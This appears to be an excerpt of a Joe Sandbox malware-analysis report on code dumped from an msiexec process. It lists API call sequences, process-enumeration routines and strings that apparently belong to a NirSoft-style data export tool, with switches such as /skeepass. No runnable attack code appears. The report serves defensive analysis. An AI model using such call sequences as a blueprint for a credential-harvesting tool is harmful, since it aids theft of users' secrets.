                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • memset.MSVCRT ref: 004085CF
                                                              • memset.MSVCRT ref: 004085F1
                                                              • memset.MSVCRT ref: 00408606
                                                              • strcmp.MSVCRT ref: 00408645
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                              • memset.MSVCRT ref: 0040870E
                                                              • strcmp.MSVCRT ref: 0040876B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                              • String ID: ---
                                                              • API String ID: 3437578500-2854292027
                                                              • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                              • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                              APIs
                                                              • memset.MSVCRT ref: 0041087D
                                                              • memset.MSVCRT ref: 00410892
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1010922700-0
                                                              • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                              • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                              APIs
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                              • malloc.MSVCRT ref: 004186B7
                                                              • free.MSVCRT ref: 004186C7
                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                              • free.MSVCRT ref: 004186E0
                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                              • malloc.MSVCRT ref: 004186FE
                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                              • free.MSVCRT ref: 00418716
                                                              • free.MSVCRT ref: 0041872A
                                                              • free.MSVCRT ref: 00418749
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$FullNamePath$malloc$Version
                                                              • String ID: |A
                                                              • API String ID: 3356672799-1717621600
                                                              • Opcode ID: cf4da308e8b77386535cb07368452b59c4a465ddf093543d96db502a43b7ae5e
                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                              • Opcode Fuzzy Hash: cf4da308e8b77386535cb07368452b59c4a465ddf093543d96db502a43b7ae5e
                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                              • API String ID: 2081463915-1959339147
                                                              • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                              • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2012295524-70141382
                                                              • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                              • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                              • API String ID: 667068680-3953557276
                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                              • String ID:
                                                              • API String ID: 1700100422-0
                                                              • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                              • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
• Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
• Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
• Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
• Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14

Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558
• Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
• Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
• Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
• Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9

APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475
• Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
• Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58

APIs
• LoadMenuW.USER32(?,?), ref: 0040D97F
  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
• DestroyMenu.USER32(00000000), ref: 0040D99D
• CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
• GetDesktopWindow.USER32 ref: 0040D9FD
• CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
• memset.MSVCRT ref: 0040DA23
• GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
• EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
• DestroyWindow.USER32(00000005), ref: 0040DA70
  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
• String ID: caption
• API String ID: 973020956-4135340389
• Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
• Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
• Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
• Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59

Strings
• <table dir="rtl"><tr><td>, xrefs: 00410B00
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: memset$_snwprintf$wcscpy
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 1283228442-2366825230
• Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
• Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
• Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
• Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9

APIs
• wcschr.MSVCRT ref: 00413972
• wcscpy.MSVCRT ref: 00413982
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
• wcscpy.MSVCRT ref: 004139D1
• wcscat.MSVCRT ref: 004139DC
• memset.MSVCRT ref: 004139B8
  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
• memset.MSVCRT ref: 00413A00
• memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
• wcscat.MSVCRT ref: 00413A27
Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
• String ID: \systemroot
• API String ID: 4173585201-1821301763
• Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
• Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
• Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
• Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E

Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: wcscpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
• API String ID: 1284135714-318151290
• Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
• Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
• Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
• Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F

APIs
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4019544885-1856150674
• Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
• Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
• Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
• Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9

Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
• String ID: 0$6
• API String ID: 4066108131-3849865405
• Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
• Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
• Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
• Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B

APIs
• memset.MSVCRT ref: 004082EF
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
• memset.MSVCRT ref: 00408362
• memset.MSVCRT ref: 00408377
Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ByteCharMultiWide
• String ID:
• API String ID: 290601579-0
• Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
• Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
• Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
• Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59

APIs
• memchr.MSVCRT ref: 00444EBF
• memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
• memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
• memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
• memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
• memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
• memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
• memset.MSVCRT ref: 0044505E
Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memchrmemset
• String ID: PD$PD
• API String ID: 1581201632-2312785699
• Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
• Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
• Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
• Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4

APIs
• GetSystemMetrics.USER32(00000011), ref: 00409F5B
• GetSystemMetrics.USER32(00000010), ref: 00409F61
• GetDC.USER32(00000000), ref: 00409F6E
• GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
• ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
• GetWindowRect.USER32(?,?), ref: 00409FA0
• GetParent.USER32(?), ref: 00409FA5
• GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
• String ID:
• API String ID: 2163313125-0
• Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
• Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
• Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
• Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50

Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: free$wcslen
• String ID:
• API String ID: 3592753638-3916222277
• Opcode ID: c59fdb48a3366d700cf217102287a2c2b572dc418e1d07a2ad87836d96891f11
• Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
• Opcode Fuzzy Hash: c59fdb48a3366d700cf217102287a2c2b572dc418e1d07a2ad87836d96891f11
• Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D

APIs
• memset.MSVCRT ref: 0040A47B
• _snwprintf.MSVCRT ref: 0040A4AE
• wcslen.MSVCRT ref: 0040A4BA
• memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
• wcslen.MSVCRT ref: 0040A4E0
• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
Memory Dump Source
